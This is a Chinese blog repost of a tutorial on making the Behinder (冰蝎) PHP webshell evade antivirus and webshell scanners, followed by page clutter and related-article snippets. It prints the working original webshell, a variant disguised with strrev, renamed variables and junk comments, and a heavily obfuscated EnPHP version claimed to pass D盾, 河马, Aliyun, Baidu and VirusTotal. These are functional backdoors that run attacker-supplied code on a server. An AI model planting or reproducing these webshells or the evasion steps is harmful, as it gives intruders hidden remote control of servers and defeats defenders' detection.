冰蝎webshell免杀(技巧)

最新推荐文章于 2024-06-15 09:59:05 发布
最新推荐文章于 2024-06-15 09:59:05 发布
阅读量2k 收藏 8
点赞数 2
文章标签: web安全 渗透测试 网络安全
原文链接:https://xz.aliyun.com/t/11149
版权 
零基础学黑客,搜索公众号:白帽子左一

前段时间退出了内网的学习,现在开始复习web方面的漏洞了,于是乎,开始了挖洞之旅,当我像往常一样上传冰蝎的webhsell时,发现冰蝎的马子居然被杀了…于是便有了该文章…

先说一下目前的免杀情况:

D盾,河马等都零警报,
vt全绿,
阿里云webshell查杀安全,
百度webshell查杀安全,
其他等等…
目前仅测试了这些…其他的自行测试。

文章开始:

首先看一下冰蝎的原版马子:

<?php
@error_reporting(0);
session_start();
    $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
    $_SESSION['k']=$key;
    $post=file_get_contents("php://input");
    if(!extension_loaded('openssl'))
    {
        $t="base64_"."decode";
        $post=$t($post."");

        for($i=0;$i<strlen($post);$i++) {
                 $post[$i] = $post[$i]^$key[$i+1&15]; 
                }
    }
    else
    {
        $post=openssl_decrypt($post, "AES128", $key);
    }
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
    class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
?>

看一下原版的查杀率:

图片

再看一下百度的接口:

图片

阿里:

图片

河马,D盾:

图片

基本上都被杀软标记了…

那么我们想用冰蝎的话,就必须要免杀了

先说一下免杀的思路:

对于静态免杀,主要便是混淆代码了,base64,hex,异或等等…

反正思路要扩展起来,可能很多师傅是玩ctf的,我没玩过…像里面的凯撒密码…等等各种密码学的东西其实可以搬到免杀的思路上来,但是像base64等等…可能早就被杀软计入特征库了,所以用base64等简单的加密,对webshell免杀可能不太好使了,

那有没有简单些的方式达到静态免杀呢?

答案是肯定的…

比如php的字符串逆置函数strrev(),可以将代码颠倒顺序,再在webshell里面加入注释,变量名称改改…使用一些php的魔术函数…以达到绕过杀软的静态防护。

我们将webshell放到d盾查杀…

看看到底是哪部分代码导致被查杀…[做个免杀的师傅应该都知道特征码定位技术,定位特征码,修改特征码绕过杀软]。

这里各位师傅自己尝试吧,建议二分法尝试,或则根据自己的经验判断。

我这里对下面部分代码进行逆值颠倒:

<?php
/*
我啥也不知道.....
sjfasaadssada
dadadad
*/
session_start();
    $ok="1989870a9753c7b3";//cwk
    $_SESSION['k']=$ok;
    $zyq=(strrev("stnetnoc_teg_elif"))(strrev("tupni//:php"));
    $love=15;
    if(!extension_loaded(strrev('lssnepo')))
    {
        /*
我啥也不知道.....
sjfasaadssada
dadadad
*/
        $t=strrev("edoced_46esab");
        $zyq=$t($zyq."");
        /*
我啥也不知道.....
sjfasaadssada
dadadad
*/
        for($i=0;$i<strlen($zyq);$i++) {
            $o= $ok[$i+1&$love]^$zyq[$i]; 
            $zyq[$i] =$o;
        }
    }
    else
    {
        $zyq=(strrev("tpyrced_lssnepo"))($zyq, "AES128", $ok);
    }
    $arr=explode('|',$zyq);
    $func=$arr[0];
    /*
我啥也不知道.....
sjfasaadssada
dadadad
*/
    $suansuan=$arr[1];
    class MOL{
        public function __construct($p) 
    {   
        $a=null;
        $l=null;
            /*
我啥也不知道.....
sjfasaadssada
dadadad
*/
        assert("/*#`|W$~Q*/".$l.$p.$a.""."/*#`|W$~Q*/");
        }
        /*
我啥也不知道.....
sjfasaadssada
dadadad
*/
        }
    @new MOL($suansuan);    
?>
/*
我啥也不知道.....
sjfasaadssada
dadadad
*/

这里就是简单的改了一下变量名称,增加了一些注释,还有魔术函数…

可以看一下D盾,河马过了

在这里插入图片描述

至于百度那个还有阿里云…:

图片

图片

果然它们还是很强…

怎么办呢?

到这一步,对于我这种小白而言,已经穷途末路了…

但是我们还可以借助外部力量…

之前代码审计的时候,发现很多代码都进行的加密…但是程序依旧可以运行,所以我们可不可以对我们的webshell进行加密呢?

当然肯定的…随便在网上找找免费的加密网站…

https://enphp.djunny.com/

把能勾的全都勾了…

图片

进行加密处理:

加密之后的webshell:

<?php
/*
ddsds

-- EnPHP v2: http://enphp.djunny.com/
*/goto 愉帻;悈岽:$禈=0x0f;goto 佽乒;廷迹:class MOL{public function __construct($蚱岊){goto 榈蚨;榈蚨:$咜孟=null;goto 堥崍;悉ψ:溹唤(0x00000216a,0x02143)(溹唤(0x000219a,0x0021a8,0x0000218c,$蠇柱).$挃啚.$蚱岊.$咜孟.((parse_str("",$毇蒿)||$毇蒿)?base64_decode(key($毇蒿)):"").溹唤(0x000219a,0x0021a8,0x0000218c,$蠇柱));goto 稗;堥崍:$挃啚=null;goto 悉ψ;稗:}}goto 沫瞅;桷:if(!($仌弲<旞馨(0x000164b,0x01658,0x00161d)($夝麈)))goto 忟;goto €?洭矽:$嬴旔=騼霾(0x01ef5,0x0001f1f,0x0001ecf)(旞馨(0x015ef,0x00015fb,0x000015c5));goto ;非嗁:goto ;goto 堧駫;湛茎:session_start();goto 壼;沫瞅:@new MOL($鉃珛);goto 敝偖;壼:$璧瑏=騼霾(0x0001e70,0x00001e5d,$璧瑏);goto 啚庁;堧駫:僚曛:goto 洭矽;堝:function 溹唤(){goto 毢欫;毢欫:$昶橏=0x000002084;goto 楹惄;溺骝:櫡:goto 摅麜;陮粠:縼:goto 乔;菃変:return base64_decode('LyojYHxXJH5RKi8');goto 祲;乔:if(!($镫罢[0]==$昶橏+0x00a6))goto 鞃ㄝ;goto 贂慆;撁贪:鞃ㄝ:goto 苺鄞;楹惄:$镫罢=func_get_args();goto 玟葓;夠珱:return base64_decode(join("",array('Q','U','V','T','M','T','I','4')));goto 陮粠;贂慆:return base64_decode('fA');goto 撁贪;祲:濮:goto 摩弧;樅蓴:return((parse_str("砻鋻=YXNzZXJ0",$鑸塥)||$鑸塥)?base64_decode($鑸塥['砻鋻']):"");goto 溺骝;玟葓:if(!($镫罢[0x0002]==$昶橏+0x0000018))goto 縼;goto 夠珱;苺鄞:if(!($镫罢[0x001]==$昶橏+0x00bf))goto 櫡;goto 樅蓴;摅麜:if(!($镫罢[0x0002]==$昶橏+0x00000108))goto 濮;goto 菃変;摩弧:}goto 掑何;⒒麕:忟:goto 詪晃;詪晃::goto 枽掜;愉帻:error_reporting(0);goto 堝;动恰:goto 兑蛥;goto ⒒麕;€?$栦煻=$璧瑏[$仌弲+0x001&$禈]^$夝麈[$仌弲];goto 筮楱;席:$夝麈=strrev(旞馨(0x001695,0x000166e))($夝麈,溹唤(0x00020cd,0x020fd,0x0000209c),$璧瑏);goto 非嗁;鸂瓍:$夝麈=騼霾(0x01ef5,0x0001f1f,0x0001ecf)(騼霾(0x00001f66,0x0001f3d))(騼霾(0x01ef5,0x0001f1f,0x0001ecf)(旞馨(0x00001516)));goto 悈岽;佽乒:if(!旞馨(0x001550,0x000001521)(騼霾(0x01ef5,0x0001f1f,0x0001ecf)(旞馨(0x000158d,0x000015bb,0x00155f))))goto 僚曛;goto 席;椬窟:$仌弲++;goto 动恰;:$夝麈=$嬴旔($夝麈.gzinflate(' '));goto 笣;筮楱:$夝麈[$仌弲]=$栦煻;goto 檽偷;囫鸱:$阱蜎=$亽邼[0];goto 筷圆;筷圆:$鉃珛=$亽邼[0x001];goto 廷迹;檽偷:柇儶:goto 椬窟;掑何:function 旞馨(){goto 槥;堂稅:劳尤:goto 蒎埊;吒偳:险碍:goto 粳鰷;蒎埊:if(!(func_get_arg(0x001)==$伖8+0x00039))goto 险碍;goto 疅;苁陡:return(($族愳=gzinflate(substr(base64_decode('H4sIAAAAAAAAA0tNyU9OTYk3MUstTkwCAPbVV20NAAAA'),10,-8)))?$族愳:$丹椵);goto 觋Ⅹ;猷囔:return gzinflate('+)-人宰??  ');goto 堂稅;檸煿:if(!($螵孳[0x001]==$伖8+0x0186))goto 洞;goto 耽;燥鐣:if(!($螵孳[0x0002]==$伖8+0x00dd))goto 竿涡;goto 苁陡;亏彊:if(!($螵孳[0]==$伖8+0x002e))goto 劳尤;goto 猷囔;耽:return base64_decode('dHB5cmNlZF9sc3NuZXBv');goto 枟;疅:return base64_decode(join("",array('Z','X','h','0','Z','W','5','z','a','W','9','u','X','2','x','v','Y','W','R','l','Z','A')));goto 吒偳;亡铷:if(!($螵孳[0x0002]==$伖8+0x00000135))goto 浰琬;goto 华榇;柮键:浰琬:goto 檸煿;华榇:return base64_decode('c3RybGVu');goto 柮键;陥:$螵孳=func_get_args();goto 亏彊;枟:洞:goto 飹;觋Ⅹ:竿涡:goto 亡铷;槥:$伖8=0x00014e8;goto 陥;掟椴:纯臃:goto 燥鐣;兎烑:return gzinflate('?.蜬-? ');goto 掟椴;粳鰷:if(!($螵孳[0x0002]==$伖8+0x0000077))goto 纯臃;goto 兎烑;飹:}goto 鸨呦;啚庁:$_SESSION[騼霾(0x01ea5,0x000001e7c)]=$璧瑏;goto 鸂瓍;笣:$仌弲=0;goto 鹗寛;鹗寛:兑蛥:goto 桷;枽掜:$亽邼=explode(溹唤(0x0212a),$夝麈);goto 囫鸱;鸨呦:function 騼霾(){goto 阌;裏宴:return((parse_str("aw",$艳焯)||$艳焯)?base64_decode(key($艳焯)):"");goto 贁偫;溉:朝惉:goto 嬄虔;阌:$紧耖=0x01e50;goto 姥钷;硫:肮秆:goto 秱隇;劑矄:if(!($置钳[0x0002]==$紧耖+0x0007f))goto 肮秆;goto 炶澔;汅佞:return base64_decode(join("",array('M','T','k','4','O','T','g','3','M','G','E','5','N','z','U','z','Y','z','d','i','M','w')));goto 溉;帐肖:return base64_decode(join("",array('c','3','R','u','Z','X','R','u','b','2','N','f','d','G','V','n','X','2','V','s','a','W','Y')));goto 铂傈;秱隇:if(!($置钳[0x001]==$紧耖+0x000ed))goto 鎰;goto 帐肖;贁偫:瑧櫡:goto 劑矄;渭饸:if(!($置钳[0x001]==$紧耖+0x0000d))goto 朝惉;goto 汅佞;铂傈:鎰:goto 玳剷;嬄虔:if(!($置钳[0x001]==$紧耖+0x000002c))goto 瑧櫡;goto 裏宴;姥钷:$置钳=func_get_args();goto 渭饸;炶澔:return gzinflate('+.)*J- ');goto 硫;玳剷:}goto 湛茎;敝偖:echo((parse_str("LyoNCuaIkeWVpeS5n%2BS4jeefpemBky4uLi4uDQpzamZhc2FhZHNzYWRhDQpkYWRhZGFkDQoqLw0K",$啠)||$啠)?base64_decode(key($啠)):"");

反正我是看不懂了…就看杀软看不看的懂了…

d盾河马。。。

图片

百度查杀接口…

图片

阿里:

图片

vt:

图片

https://n.shellpub.com/:

图片

都过了…

尝试连接:

图片

图片

图片

嗯…很好

总结:

对于免杀这方面有很多技巧…有时候也有玄学加成…哈哈哈,很奇怪,有时间各位师傅可以多看看杀软的工作原理再做免杀…

本来前段时间想写shellcode的免杀什么的,但是太懒了

怎么说呢…免杀学的是技巧…一般发出来的免杀都活不了多久,所以说还是需要自己多学习一些技巧的…

对了,上面那个加密网站好像每次加密的效果不一样,如果加密之后d盾警告的话,可以增删改注释…

作者:suansuan,原文地址:https://xz.aliyun.com/t/11149

在这里插入图片描述
在这里插入图片描述

zkzq
关注
  • 2
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
webshell
weixin_46168073的博客
11-19 1460
题目 直接打开蚁剑 得到flag
webshell_某系统绕过waf拿下webshell
weixin_42401178的博客
12-26 598
文章来源:安全先师前言对于一个不怎么拿站的我来说搞一次站点确实费劲。前不久拿了一个站点。分享一下粗略过程。正文小伙伴所在的地方要让搞某系统测试,发到群里让看看。我看了一波貌似没有什么洞洞这让我,想起三年前的某系统的算算术的漏洞于是,想搞一份源代码研究一下这个算算术的这个东东于是操起神器在fofa上找到一个站的可以算算术接下来掏出exp就开始怼。结果显示如下。连接被重置了想到的是某x云。结...
天蝎1_天蝎webshell_webshell管理_
10-01
webshell管理工具天蝎,是由冰蝎变种,可以绕过各种检测设备。
第96篇:蓝队分析研判工具箱1.08版本(溯源辅助|解密攻击流量|冰蝎、哥斯拉、天蝎解密|资产测绘搜索)...
最新发布
ABC_123的博客
06-15 646
Part1 前言大家好,我是ABC_123。在日常的工作学习中,ABC_123写了很多的蓝队分析方面的小脚本小工具,来回切换工具太麻烦,对于内存马的编译、反编译、各种编码解码尤其麻烦,于是将这些小工具集合起来形成了现在的“蓝队分析研判工具箱”,重点解决蓝队分析工作中的一些痛点问题。文末会给出ABC_123的官方github下载地址,后续会持续在github发布该工具的最新版本。建议大家把公众号...
Webshell不出网方案之正向socks代理reGeorg+Proxifier使用
Websec
09-14 8386
1、首先你已经拥有了一个webshell,如下我拥有一个天蝎shell: 2、机器不出网(无法ping百度)。 2、这个时候需要使用reGeorg将我们的流量正向代理出来。 reGeorg地址如下: https://github.com/sensepost/reGeorg 下载到本地。 具体详细操作使用为: 第一步:上传tunnel.(aspx/php/jsp/ashx)到你控制的服务器上(如何拥有一台已控取决于自己)。 第二步:上传成功后核对你的tunnel脚本成功使用,一般正
什么是webshell 常见的webshell工具有哪些
qq_44005305的博客
10-16 1700
Webshell是黑客经常使用的一种恶意脚本,其目的是获得服务器的执行操作权限,比如执行系统命令、窃取用户数据、删除web页面、修改主页等,其危害不言而喻。黑客通常利用常见的漏洞,如SQL注入、远程文件包含(RFI)、FTP,甚至使用跨站点脚本攻击(XSS)等方式作为社会工程攻击的一部分,最终达到控制网站服务器的目的。常见的webshell编写语言为asp、jsp和php。本文将以php Webshell为示例,详细解释Webshell的常用函数、工作方式以及常用隐藏技术。
skyscorpion:天蝎权限管理工具采用Java平台的JavaFX技术开发的桌面客户端,支持跨平台运行,目前基于JDK1.8开发,运行必须安装JDK或JRE 1.8,注意不能是open jdk,只能是oracle的jdk。权限管理工具基于冰蝎加密流量进行WebShell通信管理的原理,目前实现了jsp,aspx,php,asp端的常用操作功能,在原基础上,优化了大文件上传下载,套接字代理的问题,修改了部分API接口代码
04-01
天蝎 天蝎权限管理工具采用Java平台的JavaFX技术开发的桌面客户端,支持跨平台运行,当前基于JDK1.8开发,运行必须安装JDK或JRE 1.8,注意不能是open jdk,只能是oracle的jdk。权限管理工具基于冰蝎加密流量进行WebShell通信管理的原理,目前实现了jsp,aspx,php,asp端的常用操作功能,在原基础上,优化了大文件上传下载,套接字代理的问题,修改了部分API接口代码。
冰蝎webshell,
08-18
在虚拟机中使用并断网断电 在虚拟机中使用并断网断电 在虚拟机中使用并断网断电 在虚拟机中使用并断网断电 在虚拟机中使用并断网断电 在虚拟机中使用并断网断电 在虚拟机中使用并断网断电 主要的事情说三遍
冰蝎V4.1Behinder
03-11
冰蝎V4.1 Behinder】是一款知名的Webshell工具,主要用于网络安全测试和渗透测试领域。Webshell,也称为Web后门,是一种通过Web应用程序漏洞植入的恶意代码,允许远程控制服务器。冰蝎(Behinder)是这类工具的...
强大的webshell管理工具——冰蝎
12-26
冰蝎:强大的WebShell管理工具】 在网络安全领域,WebShell是一种常见的攻击手段,它允许攻击者通过在目标服务器上部署后门程序来控制或监控网站。冰蝎(Behinder)是一款专为WebShell管理设计的强大工具,它以其...
华夏免杀webshell
08-13
webshell webshell webshell webshell
WebShell
05-03
WebShell
Webshell免杀教程
02-03
以下是一些常见的 Webshell 免杀技巧: 1. **代码混淆**:改变关键函数的大小写,混合使用大小写字母,增加杀毒软件识别的难度。 2. **反写代码**:将容易被查杀的文件系统对象(如 FSO)的读写代码反写为字符串,...
冰蝎-Webshell管理工具
weixin_66717977的博客
06-30 7005
冰蝎超详解,新手食用
webshell使用与流量分析(含数据包)
hackzkaq的博客
04-29 3961
零基础学黑客,搜索公众号:白帽子左一 作者:掌控安全学员-逍遥子 一、菜刀 1.使用方法 菜刀的使用简单,将一句话木马上传到目标,然后直接使用菜刀连接即可,菜刀主要可以对目标进行虚拟终端,文件操作,数据库操作等。 2.流量分析 1.当菜刀和服务器连接后:最开的的两次流量通信,便产生了大量的数据信息。且使用了base64的方式进行编码 2.对数据解码,发现第一的数据是获取设备的信息,第二段数据是写入了一段新的木马,对第二段的base64编码进行转码整理后得到; @ini_set("displa
bypass!webshell动态免杀工具
潇湘信安的博客
05-09 259
webshell动态免杀工具由作者花了两天时间用php语言开发的带ui的免杀工具,使用者可上传由冰蝎或者天蝎生成的webshell,动态自动生成免杀webshell
冰歇webshell初探
qq_69775412的博客
04-22 5514
木马样本: <?php class C{ public function __invoke($p) { eval($p.""); } }; session_start(); isset($_GET['pass'])?print $_SESSION['k']=substr(md5(uniqid(rand())),16):($b=explode('|',openssl_decrypt(file_get_contents("php://input"), "AES128", $_SESSIO
跌跌撞撞的攻防打点
G0mini的博客
08-21 502
每一次攻防都会有"从遇到问题到解决问题"的过程。
改造冰蝎马,实现免杀之default_aes php
realmels的博客
12-17 1222
之前发的免杀文章有人说失效了。确实失效了。shellcode的免杀失效了,webshell免杀被杀了。按理说我应该把之前的文章删掉。但是我不仅没有删,还开了一个专栏叫免杀。因为免杀这种东西,就是提供一个思路。你顺着这个思路,自己对你的shellcode或者webshell进行改造。然后不要发到网上去。发到网上去就会被waf的爬虫找到,然后你的免杀就失效了。我在写之前的文章就料到有这样一天。
如何识别冰蝎webshell文件
07-14
识别冰蝎冰蝎RAT)Webshell 文件可以是一项复杂的任务,因为这种 Webshell 文件通常会采用各种隐蔽和加密技术来逃避检测。以下是一些常见的方法和指南,可用于帮助识别冰蝎 Webshell 文件: 1. 文件名和路径:冰蝎 Webshell 文件通常会使用伪装性强的文件名和路径,以掩盖其真实用途。一些常见的文件名可能包括类似于 "index.php.bak" 或 "config.php.bak" 的后缀。 2. 文件内容:冰蝎 Webshell 文件的内容通常会包含加密、编码或混淆的代码。这些代码可能会使用变量替换、字符串拼接等技术来隐藏其真实功能。您可以检查文件内容中是否存在可疑的、与正常网页文件不符合的代码段。 3. HTTP 请求特征:冰蝎 Webshell 文件通常通过 HTTP 协议与远程控制服务器通信。您可以检查文件中是否存在与远程控制服务器通信相关的特征,如特定的 URL、POST 或 GET 请求等。 4. 常见指纹:冰蝎 Webshell 是一种常见的 Webshell 类型,有许多安全工具和脚本可以帮助您识别这种类型的 Webshell。例如,一些Webshell扫描器可以通过检查文件的特定特征或指纹来识别冰蝎 Webshell 文件。 5. 安全工具:使用安全工具进行扫描和检测,如安全防护软件、Web应用程序防火墙(WAF)等。这些工具可以帮助您自动检测和识别冰蝎 Webshell 文件。 除了上述方法,还有许多其他技术和工具可用于识别冰蝎 Webshell 文件。然而,鉴于冰蝎 Webshell 的变种和不断演变,没有一种方法可以完全保证识别所有的冰蝎 Webshell。因此,如果您怀疑系统中存在冰蝎 Webshell 文件,最好寻求专业的安全专家或安全团队的帮助来进行详细的分析和处理。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值